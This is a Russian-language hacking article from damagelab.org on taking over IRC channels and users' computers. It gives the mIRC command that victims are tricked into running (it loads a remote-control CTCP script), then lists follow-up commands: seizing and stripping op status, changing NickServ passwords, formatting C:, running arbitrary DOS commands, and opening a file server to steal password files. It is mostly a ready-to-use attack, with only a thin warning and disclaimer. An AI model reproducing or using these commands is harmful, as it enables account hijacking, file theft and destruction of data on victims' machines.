############################################
# - Автор: Winux
# - ICQ: 11177222
# - E-mail: admin@damagelab.org
# - Site: http://damagelab.org
# - IRC: irc.damagelab.org #damagelab
############################################


[Inrto]

Сейчас стало модным каждому прогрессивному нет коммунити иметь свой канал в IRC. Что только не делают бедные админы дабы его раскрутить. Вот 10 минут назад смотрел новый варезник. Они еще и форум то не поставили - голая CMS с шаблонным дизайном, а снизу подпись: "заходите на наш канал". Да еще потом и оказывается что на этом канале сидит 15 человек да еще и бот да еще и раздают халявные БНЦ акки. В этой статье я коротко расскажу как можно постебаться над опами и неопами в чужом IRC канале. Оказывается, с помощью IRC можно не только захватить вражеский канал, но и полазить по винту у его мемберов.

[Equipment]

Итак, кроме своих собственных мозгов и прямых рук нам потребуется:
-IRC клиент на ваш вкус
-Вражеский канал с глупыми и не очень опами
-Навыки в соц. инженерии (потребуется 1-2 раза)

[Social Engeneering]

Здесь Вам придется сделать только одну вещ: заставить глупого опа под другим предлогом выполнить команду:

=========================
//write oper.pas ctcp 1:*:?:$1- | Load -rs oper.pas
=========================


Nota bene!
=========================
Ни в коем случае никогда сами не вводите эту команду, особенно если залогинились под своим ником.
Если Вы оп на каком-то канале: не поддавайтесь на такие уловки. Лучше сразу кикнуть того, кто это предложил, так как если не Вы, то кто-либо другой с Вашего канала выполнит эту команду и тогда придется горькоsad.gif
=========================


Заставить выполнить команду можно не только опа, но и любого ирк юзера, только канал будет потом не захватить. Можно будет только шалить с его винтом от его имени кидать мессяги в чан.

[Op functions]

Если Вы заставили оп выполнить-таки эту команду, то вы сможете:
NICK - ник жертвы. OUR_NICK - наш ник

=========================
/ctcp NICK /mode #channel +o OUR_NICK
=========================

Дает опа челу с ником OUR_NICK

Тут можно поглумиться. Вместо +o можно ставить и -o и +v и -v и что вообще заблагорассудится. Если опов на канале несколько - можно лишить их всех опства, предварительно став опом самому. Например последовательностью команд:

/ctcp NICK /mode #channel +o OUR_NICK
/ctcp NICK /mode #channel -o OP1
/ctcp NICK /mode #channel -o OP2
/ctcp NICK /mode #channel -o OP3
/ctcp NICK /mode #channel -o NICK


где OP1, OP2 и OP3 - ники опов. Последним из опства вышибаем того опа, акком которого мы пользуемся.
Далее, чтоб восстановления опов стало невозможным можно убрать их из AOP стандартными функциями, а себя назначить.
Другие функции, которыми можно воспользоваться, дабы испортить жизнь уже выгнанным опам будут описаны ниже.

[Users attack on the channel]

Если трахнули Вы не Опа а обычного рядового юзера, то мы сможем (с опами это тоже можно делать):

/ctcp NICK /j #CHANNEL - сделать чтоб юзер зашел на тот или иной канал.
/ctcp NICK /part #CHANNEL - выкинуть юзера с канала
/ctcp NICK /nick новый_ник - меняем ник жертве

Как видно, мы выполняем стандартные команды от имени жертвы. Можно пофантазировать.

/ctcp NICK /msg #CHANNEL блаблабла - посылаем сообщение от имени жертвы
/ctcp NICK /msg PRIV_NICK message - сообщение в приват юзеру PRIV_NICK
/ctcp NICK /exit - закрываем клиент жертвы
/ctcp NICK /msg nickserv set passwd password - меняем пасс жертвы на password.
Рекомендуется сделать после захвата канала всем опам, выполнившим команду. Тогда Вы исключите обратный захват.

[System attack]

Вот и самое вкусное. Ты заставил юзера выполнить команду, описанную в первом пункте? Отлично, теперь можно постебаться над его домашним компом.

/ctcp NICK /run format C:/ - форматирует жесткий диск жертвы (иногда необходимо подтверждение ан форматирование, так что скорее всего не выйдет)
/ctcp NICK /run command - выполняет любую команду MS-DOS. Тут предоставляется воля Вам самим. Помните, что через DOS можно ходить по жесткому диску и удалять и менять файлы на нем, но действовать придется "вслепую".
/ctcp NICK /run mirc - запуск mirc на компе жертвы
/ctcp NICK /run regedit - запуск редактора реестра на компе жертвы
/ctcp NICK /run notepad - запускает блокнот на компе жертвы
Таким образом можно запустить любую прогу, прописанную для запуска через CMD
/ctcp NICK /timer1 0 0 /ping $me - самодосинг жертвы (будет сама себе пакеты слать)
/ctcp NICK /run exitwindows - ну и наконец выключение компа жертвы


Далее, если мы хотим смотреть содержимое жесткого диска, качать, менять и удалять файлы на нем, то нам потребуется заставить жертву выполнить другую команду:

=========================
/fserve OUR_NICK 4 c:
=========================


Где OUR_NICK - наш ник, а c: - имя девайса, на котором будем шарить.
Кста, если Вы уже заставили жертву выполнить первую команду - можете попробовать сделать это:

=========================
/ctcp NICK /fserve OUR_NICK 4 c:
=========================


вместо социальной инженерии. Команда /ctcp NICK выполняет стандартные IRC команды на компе жертвы, поэтому никто не мешает выполнить и /fserve OUR_NICK 4 c: без социальной инженерии, однако не всегда выходит.

Итак, что мы теперь можем:

cd - стандартныя DOS команда. Переходим в папки. Например cd windows - переход в папку Windows. Чтобы вернуться на уровень выше - набираем cd../
dir - показывает содержание текущей директории
get - скачивание файла с компа жертвы себе. ВНИМАНИЕ: Жертва может видеть передачу файлов. Старайтесь быть быстрым и незаметным. Способ хорош для угона файлов, содержащих пароли от прог, например аси или фтп клиентов.
read - читает текстовые файлы на компе жертвы.
del - удаление файла
format - форматирование тома диска
md - создание папки
rd - удаление папки
print - вывод в печать текстовых файлов


[Conclusion]

Как видно, IRC сломать не так-то просто и без социальной инженерии тут не обойтись. Однако, мелкие недочеты в сервисе могут привести к достаточно серьезным последствиям.

Nota bene!
=========================
Администраторы IRC серваков давно в курсе данных недочетов и банят всех, кто этим пользуется. Если решили испытать (даже на себе), то постарайтесь юзать другой сервак и нерегнутый ник.
Автор не несет никакой ответственности за Ваши нелегальные действия. В случае, если Вы используйте эту инфу в противозаконных целях, то вся ответственность за Ваши деяния лежит исключительно на Вас.
=========================